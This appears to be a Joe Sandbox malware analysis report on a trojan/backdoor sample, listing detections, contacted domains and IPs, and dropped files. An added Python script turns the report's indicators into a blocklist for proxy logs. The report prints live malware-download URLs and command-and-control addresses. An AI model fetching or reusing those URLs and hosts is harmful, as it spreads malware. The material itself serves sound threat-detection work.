18.0.3D34.exe.ec0000.3.unpack | 100% | Avira | HEUR/AGEN.1211353
12.0.BB8A.exe.2080e50.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
17.2.D936.exe.22b0e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
15.2.CCB2.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
32.2.krmdinzg.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
1.0.ECD2MpEBSf.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
18.0.3D34.exe.ec0000.2.unpack | 100% | Avira | HEUR/AGEN.1211353
1.0.ECD2MpEBSf.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1123244
1.2.ECD2MpEBSf.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.BB8A.exe.2080e50.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
35.2.svchost.exe.e70000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
37.0.3D34.exe.150000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
12.3.BB8A.exe.2090000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.0.ECD2MpEBSf.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1123244
15.3.CCB2.exe.7b0000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
32.3.krmdinzg.exe.7c0000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.0.ECD2MpEBSf.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
11.0.jgdhbua.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.0.ECD2MpEBSf.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1123244
12.0.BB8A.exe.2080e50.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
37.2.3D34.exe.150000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
12.2.BB8A.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
37.0.3D34.exe.150000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
1.0.ECD2MpEBSf.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
11.1.jgdhbua.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
32.2.krmdinzg.exe.6c0e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
32.2.krmdinzg.exe.7c0000.2.unpack | 100% | Avira | BDS/Backdoor.Gen
0.2.ECD2MpEBSf.exe.5715a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.0.BB8A.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
37.0.3D34.exe.150000.3.unpack | 100% | Avira | HEUR/AGEN.1211353
17.2.D936.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
18.2.3D34.exe.ec0000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
18.0.3D34.exe.ec0000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
11.2.jgdhbua.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
37.0.3D34.exe.150000.2.unpack | 100% | Avira | HEUR/AGEN.1211353
18.0.3D34.exe.ec0000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
11.0.jgdhbua.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
15.2.CCB2.exe.680e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen

                      Domains

                      No Antivirus matches

                      URLs

Source | Detection | Scanner | Label
https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe
https://api.ip.sb/ip | 0% | URL Reputation | safe
https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe
http://unicupload.top/install5.exe | 100% | URL Reputation | phishing
http://185.163.204.24/ | 0% | Avira URL Cloud | safe
http://data-host-coin-8.com/files/7729_1642101604_1835.exe | 100% | Avira URL Cloud | malware
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | 100% | Avira URL Cloud | malware
http://81.163.30.181/l2.exe | 100% | Avira URL Cloud | malware
http://data-host-coin-8.com/game.exe | 0% | URL Reputation | safe
http://185.163.204.24//l/f/RGwRWn4BZ2GIX1a3oIgO/7e7a36a98c7545dda4f314e30bbcbe9a8ba64652 | 0% | Avira URL Cloud | safe
http://185.7.214.171:8080/6.php | 100% | URL Reputation | malware
http://74.201.28.62/book/KB5009812.png | 0% | Avira URL Cloud | safe
http://185.163.204.24//l/f/RGwRWn4BZ2GIX1a3oIgO/6bf5d5b41363c3e6b44705458de7ee6f935456db | 0% | Avira URL Cloud | safe
https://disneyplus.com/legal. | 0% | URL Reputation | safe
http://host-data-coin-11.com/ | 0% | URL Reputation | safe
http://crl.ver) | 0% | Avira URL Cloud | safe
http://185.163.204.22/capibar | 100% | Avira URL Cloud | malware
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
http://74.201.28.62/book/KB5009812.exe | 0% | Avira URL Cloud | safe
http://data-host-coin-8.com/files/6961_1642089187_2359.exe | 100% | Avira URL Cloud | malware
http://help.disneyplus.com. | 0% | URL Reputation | safe
http://81.163.30.181/l3.exe | 100% | Avira URL Cloud | malware

                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
unicupload.top | 54.38.220.85 | true | false | - | high
host-data-coin-11.com | 8.209.70.0 | true | false | - | high
github.com | 140.82.121.4 | true | false | - | high
patmushta.info | 94.142.143.116 | true | false | - | high
raw.githubusercontent.com | 185.199.108.133 | true | false | - | high
cdn.discordapp.com | 162.159.135.233 | true | false | - | high
microsoft-com.mail.protection.outlook.com | 104.47.53.36 | true | false | - | high
iplogger.org | 148.251.234.83 | true | false | - | high
goo.su | 172.67.139.105 | true | false | - | high
transfer.sh | 144.76.136.153 | true | false | - | high
data-host-coin-8.com | 8.209.70.0 | true | false | - | high
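A practitioner reading the contacted-domain and URL tables above usually wants to run them against their own proxy logs. The Python below is an added example, not part of the report: it takes the hosts, addresses and malware/phishing-flagged URLs listed on this page as a blocklist, normalises URLs (lower-case host, default port and query string dropped, repeated slashes collapsed) so that the report's doubled-slash path on 185.163.204.24 still matches a single-slash request, handles CONNECT tunnels by host or IP since they carry no path, and reports each hit with the reason it matched. The Squid-style access-log lines, client addresses and the example.com request are constructed for the example and do not come from the report.

```python
"""Check proxy access-log lines against the network indicators listed in this report.

Added example; the log lines are constructed, the indicators come from the report's tables.
"""
import ipaddress
import re
from typing import List, NamedTuple, Optional, Set
from urllib.parse import urlsplit

# Download/C2 URLs the report's URL table flags as malware or phishing.
MALICIOUS_URLS: Set[str] = {
    "http://unicupload.top/install5.exe",
    "http://data-host-coin-8.com/files/7729_1642101604_1835.exe",
    "http://data-host-coin-8.com/files/9030_1641816409_7037.exe",
    "http://data-host-coin-8.com/files/6961_1642089187_2359.exe",
    "http://81.163.30.181/l2.exe",
    "http://81.163.30.181/l3.exe",
    "http://185.7.214.171:8080/6.php",
    "http://185.163.204.22/capibar",
    # Listed with a doubled slash in the report; normalisation makes it equal to the single-slash form.
    "http://185.163.204.24//l/f/RGwRWn4BZ2GIX1a3oIgO/7e7a36a98c7545dda4f314e30bbcbe9a8ba64652",
    "http://185.163.204.24//l/f/RGwRWn4BZ2GIX1a3oIgO/6bf5d5b41363c3e6b44705458de7ee6f935456db",
}
# Hosts serving those URLs, plus patmushta.info, which the injected svchost.exe contacted over 443.
C2_HOSTS: Set[str] = {"unicupload.top", "data-host-coin-8.com", "patmushta.info"}
# Addresses serving those URLs, plus the two the behavior graph shows svchost.exe/explorer.exe reaching.
C2_IPS = {ipaddress.ip_address(a) for a in (
    "185.163.204.24", "185.163.204.22", "81.163.30.181", "185.7.214.171",
    "94.142.143.116", "185.233.81.115",
)}


class Hit(NamedTuple):
    client: str
    target: str
    indicator: str
    reason: str  # "url", "host" or "ip"


def normalize_url(url: str) -> str:
    """Lower-case host, drop default port and query, collapse repeated slashes ('//l/f' == '/l/f')."""
    parts = urlsplit(url.strip())
    host = (parts.hostname or "").lower()
    try:
        port = parts.port
    except ValueError:
        port = None  # malformed port: compare on host alone
    scheme = parts.scheme.lower()
    default = {"http": 80, "https": 443}.get(scheme)
    netloc = host if port in (None, default) else f"{host}:{port}"
    path = re.sub(r"/{2,}", "/", parts.path) or "/"
    return f"{scheme}://{netloc}{path}"


NORMALIZED_URLS = {normalize_url(u) for u in MALICIOUS_URLS}


def _host_hit(client: str, target: str, host: str) -> Optional[Hit]:
    host = host.lower().strip("[]")
    if host in C2_HOSTS:
        return Hit(client, target, host, "host")
    try:
        if ipaddress.ip_address(host) in C2_IPS:
            return Hit(client, target, host, "ip")
    except ValueError:
        pass  # not an IP literal
    return None


def match_request(client: str, method: str, target: str) -> Optional[Hit]:
    """Exact URL first, then host/IP; CONNECT targets are 'host:port' and have no path to compare."""
    if method.upper() == "CONNECT":
        host = target.rsplit(":", 1)[0] if ":" in target else target
        return _host_hit(client, target, host)
    norm = normalize_url(target)
    if norm in NORMALIZED_URLS:
        return Hit(client, target, norm, "url")
    return _host_hit(client, target, urlsplit(norm).hostname or "")


def scan_squid_log(lines: List[str]) -> List[Hit]:
    """Squid native access.log: time elapsed client code/status bytes method URL rfc931 hierarchy type."""
    hits: List[Hit] = []
    for line in lines:
        fields = line.split()
        if len(fields) < 7:
            continue
        hit = match_request(fields[2], fields[5], fields[6])
        if hit:
            hits.append(hit)
    return hits


# Constructed log lines for the example; clients, timestamps and the example.com request are invented.
SAMPLE_LOG = [
    "1642161001.412 233 10.0.0.15 TCP_MISS/200 51234 GET http://185.163.204.24/l/f/RGwRWn4BZ2GIX1a3oIgO/7e7a36a98c7545dda4f314e30bbcbe9a8ba64652 - HIER_DIRECT/185.163.204.24 application/octet-stream",
    "1642161002.003 91 10.0.0.15 TCP_TUNNEL/200 4821 CONNECT patmushta.info:443 - HIER_DIRECT/94.142.143.116 -",
    "1642161003.777 120 10.0.0.22 TCP_MISS/200 2210 GET http://www.example.com/index.html - HIER_DIRECT/93.184.216.34 text/html",
    "1642161004.118 310 10.0.0.22 TCP_MISS/404 612 GET http://DATA-HOST-COIN-8.com/game.exe - HIER_DIRECT/8.209.70.0 text/html",
    "1642161005.500 45 10.0.0.31 TCP_MISS/200 9021 GET http://185.7.214.171:8080/6.php?id=1 - HIER_DIRECT/185.7.214.171 text/html",
    "1642161006.250 60 10.0.0.31 TCP_TUNNEL/200 3300 CONNECT 185.233.81.115:443 - HIER_DIRECT/185.233.81.115 -",
]

if __name__ == "__main__":
    for h in scan_squid_log(SAMPLE_LOG):
        print(f"{h.client:10} {h.reason:5} {h.indicator:60} {h.target}")
```

The game.exe request matches on host rather than URL because the report's URL table rates that particular URL "safe" while three other paths on the same host are rated malware; keying the blocklist on hosts and addresses as well as exact URLs is what catches the payload path a sandbox run did not happen to fetch.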

                                            Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://unicupload.top/install5.exe | true | URL Reputation: phishing | unknown
http://185.163.204.24/ | true | Avira URL Cloud: safe | unknown
http://data-host-coin-8.com/files/7729_1642101604_1835.exe | true | Avira URL Cloud: malware | unknown
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | true | Avira URL Cloud: malware | unknown
http://81.163.30.181/l2.exe | true | Avira URL Cloud: malware | unknown
http://data-host-coin-8.com/game.exe | false | URL Reputation: safe | unknown
http://185.163.204.24//l/f/RGwRWn4BZ2GIX1a3oIgO/7e7a36a98c7545dda4f314e30bbcbe9a8ba64652 | true | Avira URL Cloud: safe | unknown
http://185.7.214.171:8080/6.php | true | URL Reputation: malware | unknown
http://74.201.28.62/book/KB5009812.png | true | Avira URL Cloud: safe | unknown
http://185.163.204.24//l/f/RGwRWn4BZ2GIX1a3oIgO/6bf5d5b41363c3e6b44705458de7ee6f935456db | true | Avira URL Cloud: safe | unknown
http://host-data-coin-11.com/ | false | URL Reputation: safe | unknown
http://185.163.204.22/capibar | true | Avira URL Cloud: malware | unknown
http://74.201.28.62/book/KB5009812.exe | true | Avira URL Cloud: safe | unknown
http://data-host-coin-8.com/files/6961_1642089187_2359.exe | true | Avira URL Cloud: malware | unknown
http://81.163.30.181/l3.exe | true | Avira URL Cloud: malware | unknown
                                            unknown

                                            URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://www.disneyplus.com/legal/your-california-privacy-rights | svchost.exe, 00000018.00000003.793604569.000002A07957B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.ip.sb/ip | 3D34.exe, 00000012.00000002.833275323.00000000041F1000.00000004.00000001.sdmp, 3D34.exe, 00000012.00000002.833464312.0000000004361000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.disneyplus.com/legal/privacy-policy | svchost.exe, 00000018.00000003.793604569.000002A07957B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://disneyplus.com/legal. | svchost.exe, 00000018.00000003.793604569.000002A07957B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://crl.ver) | svchost.exe, 00000018.00000002.819053495.000002A078CEE000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
https://www.tiktok.com/legal/report/feedback | svchost.exe, 00000018.00000003.794998457.000002A0795CA000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.795071055.000002A0795B3000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.795037619.000002A079592000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.795102955.000002A079A02000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.794951368.000002A0795CA000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://help.disneyplus.com. | svchost.exe, 00000018.00000003.793604569.000002A07957B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                                            Contacted IPs

                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.163.45.70 | unknown | Moldova Republic of | 39798 | MIVOCLOUDMD | false
94.142.143.116 | patmushta.info | Russian Federation | 35196 | IHOR-ASRU | false
188.166.28.199 | unknown | Netherlands | 14061 | DIGITALOCEAN-ASNUS | true
172.67.139.105 | goo.su | United States | 13335 | CLOUDFLARENETUS | false
74.201.28.62 | unknown | United States | 35913 | DEDIPATH-LLCUS | true
86.107.197.138 | unknown | Romania | 39855 | MOD-EUNL | false
8.209.70.0 | host-data-coin-11.com | Singapore | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
54.38.220.85 | unicupload.top | France | 16276 | OVHFR | false
162.159.135.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false
104.47.53.36 | microsoft-com.mail.protection.outlook.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
144.76.136.153 | transfer.sh | Germany | 24940 | HETZNER-ASDE | false
81.163.30.181 | unknown | Russian Federation | 58303 | IR-RASANAPISHTAZIR | false
185.233.81.115 | unknown | Russian Federation | 50113 | SUPERSERVERSDATACENTERRU | true
185.7.214.171 | unknown | France | 42652 | DELUNETDE | true
148.251.234.83 | iplogger.org | Germany | 24940 | HETZNER-ASDE | false
185.186.142.166 | unknown | Russian Federation | 204490 | ASKONTELRU | true
185.163.204.22 | unknown | Germany | 20771 | CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE | false
185.163.204.24 | unknown | Germany | 20771 | CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE | true

                                            Private

                                            IP
                                            192.168.2.1

                                            General Information

                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                            Analysis ID:553404
                                            Start date:14.01.2022
                                            Start time:20:27:34
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 15m 59s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:ECD2MpEBSf.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:48
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@58/27@91/19
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HDC Information:
                                            • Successful, ratio: 20.6% (good quality ratio 16%)
                                            • Quality average: 63%
                                            • Quality standard deviation: 39.5%
                                            HCA Information:
                                            • Successful, ratio: 60%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                            • TCP Packets have been reduced to 100
                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                                            • Excluded IPs from analysis (whitelisted): 23.211.6.115, 40.91.112.76, 20.54.110.249, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 20.42.65.92
                                            • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, microsoft.com, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                            • Report size exceeded maximum capacity and may have missing network information.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

Time | Type | Description
20:29:09 | Task Scheduler | Run new task: Firefox Default Browser Agent D3FD9BFE35A9B440 path: C:\Users\user\AppData\Roaming\jgdhbua
20:29:20 | API Interceptor | 1x Sleep call for process: CCB2.exe modified
20:29:30 | API Interceptor | 8x Sleep call for process: svchost.exe modified
20:29:34 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
20:30:03 | API Interceptor | 1x Sleep call for process: D502.exe modified
20:30:05 | API Interceptor | 6x Sleep call for process: A332.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            No context

                                            Domains

                                            No context

                                            ASN

                                            No context

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BB8A.exe_be9cde9f8afa847dd729874ac7bf4b4f63becc5_1db953ea_1aa14f53\Report.wer
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):65536
                                            Entropy (8bit):0.8138648214423995
                                            Encrypted:false
                                            SSDEEP:96:EMFoXBw0L4UB8OQoJ7R3V6tpXIQcQec6tycEfcw3W+HbHg/8BRTf3o8Fa9iVfOy4:NiXB4UF8HQ0lrjIq/u7sOS274ItL
                                            MD5:35C09D408A6C338FC99B4D619F09234D
                                            SHA1:B557CC04365F06A74899D2F89A372B92FBB1385F
                                            SHA-256:CBE31A4DBB4EE6246323C74A4D8636EB77A11BF8A6BFE3842D16AF7B39046AC6
                                            SHA-512:23E8BB9EC9DB20EDB7C3F061B36208031697495FA4F1FA1164E464EB6011EC43ADD2BDDF616182DE93E436D977E4F0ADCD8ABC7DA6A297C10E57133DFF7A5CB7
                                            Malicious:false
                                            Reputation:unknown
                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.6.2.1.6.3.4.4.6.0.5.1.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.6.6.2.1.7.2.6.0.2.2.6.4.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.6.7.7.6.f.3.1.-.3.9.c.1.-.4.4.4.8.-.a.6.5.d.-.1.5.b.c.e.0.d.7.7.d.d.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.2.7.9.5.a.6.1.-.b.2.1.1.-.4.7.d.a.-.8.1.1.a.-.f.b.9.d.d.9.f.7.2.2.b.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.B.B.8.A...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.a.0.-.0.0.0.1.-.0.0.1.b.-.1.f.6.e.-.b.b.0.2.7.d.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.e.8.8.d.1.e.9.a.d.e.e.6.3.e.f.3.0.e.9.c.4.2.3.1.7.4.c.7.6.e.c.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.B.B.8.A...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.
                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER6175.tmp.csv
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):52702
                                            Entropy (8bit):3.051899513483229
                                            Encrypted:false
                                            SSDEEP:1536:DMHZ0DVisN/xdUMvGpto675v1yc+Jqh//W:DMHZ0DVisN/xdUMvGpto675v1yc+Jy/u
                                            MD5:2DEB23693D4D6D1F0B30650211014B40
                                            SHA1:72E6E6CE2182B1A1C1AF4A0A3CEB2DF043DD8191
                                            SHA-256:A481D7F7B26B38CCF3929C4927AD03DA25B187C1C7DE77B62CB298A78A11E31E
                                            SHA-512:B0FB53ECD8DD88A06B32E2FBFE112E4CC7FB15595C30F2D59A9E5B7A7F2F35755B82C5DDBB7CD9C7AF227E80D44149B15251CAD6E1DCB42FFB9D172FE2CB5B85
                                            Malicious:false
                                            Reputation:unknown
                                            Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER65FA.tmp.txt
                                            Process:C:\Windows\System32\svchost.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):13340
                                            Entropy (8bit):2.6957049550715424
                                            Encrypted:false
                                            SSDEEP:96:9GiZYWEcslyQrYLYQFW0HlYEZAut6izqFXew3OnLMia+U0/q2uIC03:9jZDExs4FeLba+U0/q25C03
                                            MD5:07F06FDC5DEA39B6918FC620424D43B0
                                            SHA1:AFA91D954F8DB12AEC97F6FF59F6746442D2A7E8
                                            SHA-256:EC9A9FD75480B2FACDDAB5125C6E85115E1BF11E991AFD983FBE00112B774021
                                            SHA-512:2D1100B7E3CF54785103B166187A243D718A93467C1909D8D20BD59450D637ACE16A1F913A100557775AC318D3D9CA6B984A44862902AD6346DABB9640CFC449
                                            Malicious:false
                                            Reputation:unknown
                                            Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERAE40.tmp.dmp
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:Mini DuMP crash report, 14 streams, Fri Jan 14 19:29:24 2022, 0x1205a4 type
                                            Category:dropped
                                            Size (bytes):36708
                                            Entropy (8bit):2.1273152419502526
                                            Encrypted:false
                                            SSDEEP:192:+tJjOn9V/XOeh0kIKTZv5A6KX58TGX9VcNuCuTX4J+EnD3:EebZvyJufJhD3
                                            MD5:B8C8DEEC4450644C4227E014A2F987EF
                                            SHA1:66326B9DCCAEC52DBF078174D55669422F63F8F4
                                            SHA-256:7961AB36D2264DDD76223C005CF57840E173C220670F6850DAD3CD4D2F6041D8
                                            SHA-512:51098772159BCEFF9B35993AC7E7AA43B751DE986CEBBF61CBD80C5271827DF9ACDD78CCB06BE89F1B2000C630EA3B69EB1771BE8DC72D3BD0520BD6DAAD31DE
                                            Malicious:false
                                            Reputation:unknown
                                            Preview: MDMP....... ..........a....................................$...z%..........T.......8...........T................z..........H...........4....................................................................U...........B..............GenuineIntelW...........T..............a.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERB4E9.tmp.WERInternalMetadata.xml
                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):8392
                                            Entropy (8bit):3.702812242647528
                                            Encrypted:false
                                            SSDEEP:192:Rrl7r3GLNiZq6q6YrRSUdNgmfGRSV+pDD89bw9sfNQm:RrlsNik6q6Y9SUHgmfGRS9w2fv
